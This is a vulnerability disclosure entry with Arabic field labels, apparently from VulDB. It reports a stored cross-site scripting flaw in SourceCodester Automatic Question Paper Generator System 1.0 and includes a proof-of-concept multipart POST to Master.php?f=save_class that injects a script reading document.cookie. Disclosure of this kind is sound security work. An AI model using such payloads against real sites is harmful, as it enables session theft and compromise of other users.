| عنوان | SourceCodester Automatic Question Paper Generator System 1.0 Master.php save_class Stored XSS |
|---|
| الوصف | A Stored XSS has been discovered in SourceCodester Automatic Question Paper Generator System 1.0 , the vulnerable URI is POST /aqpg/classes/Master.php?f=save_class which is the function to edit information.
POC below:
POST /aqpg/classes/Master.php?f=save_class HTTP/1.1
***********************************************
------WebKitFormBoundaryMuenRrAEwzT5kWif
Content-Disposition: form-data; name="description"
<script>alert(document.cookie)</script>
------WebKitFormBoundaryMuenRrAEwzT5kWif
Content-Disposition: form-data; name="status"
1
------WebKitFormBoundaryMuenRrAEwzT5kWif--
|
|---|
| المصدر | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| المستخدم | WWesleywww (UID 43117) |
|---|
| ارسال | 23/03/2023 08:06 AM (3 سنوات منذ) |
|---|
| الاعتدال | 23/03/2023 09:42 AM (2 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 223661 [SourceCodester Automatic Question Paper Generator System 1.0 Master.php?f=save_class الوصف البرمجة عبر المواقع] |
|---|
| النقاط | 20 |
|---|